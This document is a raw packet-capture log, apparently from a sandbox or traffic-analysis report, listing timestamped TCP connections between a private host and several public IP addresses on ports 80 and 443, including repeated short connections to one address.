                                                                                                                                                                                Dec 30, 2024 19:45:16.438982964 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.438992023 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.439021111 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.439029932 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.469811916 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.469829082 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.469913960 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.469923973 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.470011950 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.471046925 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.471065044 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.471106052 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.471113920 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.471158981 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.471354961 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.471371889 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.471416950 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.471425056 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.471470118 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.472136021 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.472148895 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.472194910 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.472203016 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.472244024 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.472327948 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.472342968 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.472392082 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.472399950 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.472441912 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.473603010 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.523572922 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.523591042 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.523678064 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.523688078 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.523734093 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.524250984 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.524270058 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.524317980 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.524327040 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.524367094 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.525825024 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.525845051 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.525885105 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.525892973 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.525934935 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.556569099 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.556601048 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.556658983 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.556669950 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.556720972 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.557836056 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.557856083 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.557914972 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.557924032 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.557970047 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.558245897 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.558264017 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.558300018 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.558307886 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.558320045 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.558346987 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.558985949 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.559000969 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.559235096 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.559247971 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.559257984 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.559292078 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.559324980 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.610446930 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.610461950 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.610547066 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.610558987 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.611186981 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.611207008 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.611241102 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.611252069 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.611265898 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.612751007 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.612763882 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.612807989 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.612818956 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.643599033 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.643615961 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.643681049 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.643692017 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.644684076 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.644696951 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.644745111 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.644756079 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.644781113 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.645131111 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.645148039 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.645185947 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.645195961 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.645209074 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.645814896 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.645827055 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.645870924 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.645879984 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.646115065 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.646131992 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.646177053 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.646186113 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.697346926 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.697360992 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.697431087 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.697444916 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.697995901 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.698014021 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.698050976 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.698060989 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.698080063 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.699736118 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.699749947 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.699784040 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.699793100 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.699805021 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.730494022 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.730523109 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.730582952 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.730601072 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.730621099 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.731813908 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.731847048 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.731878042 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.731884003 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.731909990 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.731944084 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.740331888 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.740350008 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.740361929 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:16.740370035 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.949028969 CET5005180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:16.954220057 CET805005158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.954396963 CET5005180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:16.954521894 CET5005180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:16.954540014 CET5005180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:16.959233046 CET805005158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:16.959414959 CET805005158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:18.689690113 CET805005158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:18.689873934 CET805005158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:18.689928055 CET5005180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:18.690637112 CET5005180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:18.695419073 CET805005158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:18.696149111 CET5005280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:18.700978041 CET805005258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:18.701064110 CET5005280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:18.701184034 CET5005280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:18.701227903 CET5005280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:18.705969095 CET805005258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:18.706054926 CET805005258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:20.211200953 CET805005258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:20.211430073 CET805005258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:20.211488008 CET5005280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:20.211522102 CET5005280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:20.216269970 CET805005258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:20.218836069 CET5005380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:20.223664999 CET805005358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:20.223737955 CET5005380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:20.223864079 CET5005380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:20.223879099 CET5005380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:20.228640079 CET805005358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:20.228771925 CET805005358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:21.698214054 CET805005358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:21.698400021 CET805005358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:21.698461056 CET5005380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:21.698508978 CET5005380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:21.703239918 CET805005358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:21.703833103 CET5005480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:21.708611965 CET805005458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:21.708694935 CET5005480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:21.708884001 CET5005480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:21.708935022 CET5005480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:21.713669062 CET805005458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:21.713771105 CET805005458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:23.176513910 CET805005458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:23.176762104 CET805005458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:23.176825047 CET5005480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:23.176842928 CET5005480192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:23.180022955 CET5005580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:23.181586027 CET805005458.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:23.184859991 CET805005558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:23.184952021 CET5005580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:23.185098886 CET5005580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:23.185133934 CET5005580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:23.189919949 CET805005558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:23.190001011 CET805005558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:24.672801971 CET805005558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:24.673557043 CET805005558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:24.673636913 CET5005580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:24.673666954 CET5005580192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:24.678442001 CET805005558.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:24.680083990 CET5005680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:24.684899092 CET805005658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:24.684992075 CET5005680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:24.685197115 CET5005680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:24.685245037 CET5005680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:24.689948082 CET805005658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:24.690095901 CET805005658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:26.125819921 CET805005658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:26.125919104 CET805005658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:26.125994921 CET5005680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:26.129224062 CET5005680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:26.134017944 CET805005658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:26.463593006 CET5005780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:26.468378067 CET805005758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:26.468554974 CET5005780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:26.473896027 CET5005780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:26.473908901 CET5005780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:26.478687048 CET805005758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:26.478831053 CET805005758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:27.931920052 CET805005758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:27.932043076 CET805005758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:27.932091951 CET5005780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:27.932138920 CET5005780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:27.936863899 CET805005758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:27.939239979 CET5005880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:27.944046021 CET805005858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:27.944194078 CET5005880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:27.944336891 CET5005880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:27.944360018 CET5005880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:27.949162006 CET805005858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:27.949208975 CET805005858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:29.410043001 CET805005858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:29.410247087 CET805005858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:29.410428047 CET5005880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:29.410428047 CET5005880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:29.415232897 CET805005858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:29.425843000 CET5005980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:29.430679083 CET805005958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:29.430852890 CET5005980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:29.430948973 CET5005980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:29.430984020 CET5005980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:29.435736895 CET805005958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:29.435848951 CET805005958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:30.888448954 CET805005958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:30.888649940 CET805005958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:30.888814926 CET5005980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:30.926309109 CET5005980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:30.931086063 CET805005958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:30.943646908 CET5006080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:30.948487043 CET805006058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:30.948559999 CET5006080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:30.951487064 CET5006080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:30.951513052 CET5006080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:30.956285000 CET805006058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:30.956387997 CET805006058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:32.674526930 CET805006058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:32.675539017 CET805006058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:32.675599098 CET5006080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:32.675642967 CET5006080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:32.680440903 CET805006058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:32.682039976 CET5006180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:32.687504053 CET805006158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:32.687604904 CET5006180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:32.687740088 CET5006180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:32.687762022 CET5006180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:32.692576885 CET805006158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:32.692723989 CET805006158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:34.174436092 CET805006158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:34.174675941 CET805006158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:34.174731016 CET5006180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:34.174801111 CET5006180192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:34.179544926 CET805006158.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:34.184315920 CET5006280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:34.189163923 CET805006258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:34.189244032 CET5006280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:34.189436913 CET5006280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:34.189475060 CET5006280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:34.194225073 CET805006258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:34.194343090 CET805006258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:35.675649881 CET805006258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:35.676352978 CET805006258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:35.676527977 CET5006280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:35.676527977 CET5006280192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:35.681442022 CET805006258.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:35.682640076 CET5006380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:35.687585115 CET805006358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:35.687678099 CET5006380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:35.687838078 CET5006380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:35.687865973 CET5006380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:35.692620039 CET805006358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:35.692753077 CET805006358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.141829967 CET805006358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.142040968 CET805006358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.142096043 CET5006380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:37.142143011 CET5006380192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:37.146898031 CET805006358.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.371012926 CET50064443192.168.2.4192.185.146.136
                                                                                                                                                                                Dec 30, 2024 19:45:37.371059895 CET44350064192.185.146.136192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.371121883 CET50064443192.168.2.4192.185.146.136
                                                                                                                                                                                Dec 30, 2024 19:45:37.371520042 CET50064443192.168.2.4192.185.146.136
                                                                                                                                                                                Dec 30, 2024 19:45:37.371532917 CET44350064192.185.146.136192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.881356955 CET44350064192.185.146.136192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.881438971 CET50064443192.168.2.4192.185.146.136
                                                                                                                                                                                Dec 30, 2024 19:45:37.883114100 CET50064443192.168.2.4192.185.146.136
                                                                                                                                                                                Dec 30, 2024 19:45:37.883126020 CET44350064192.185.146.136192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.883632898 CET44350064192.185.146.136192.168.2.4
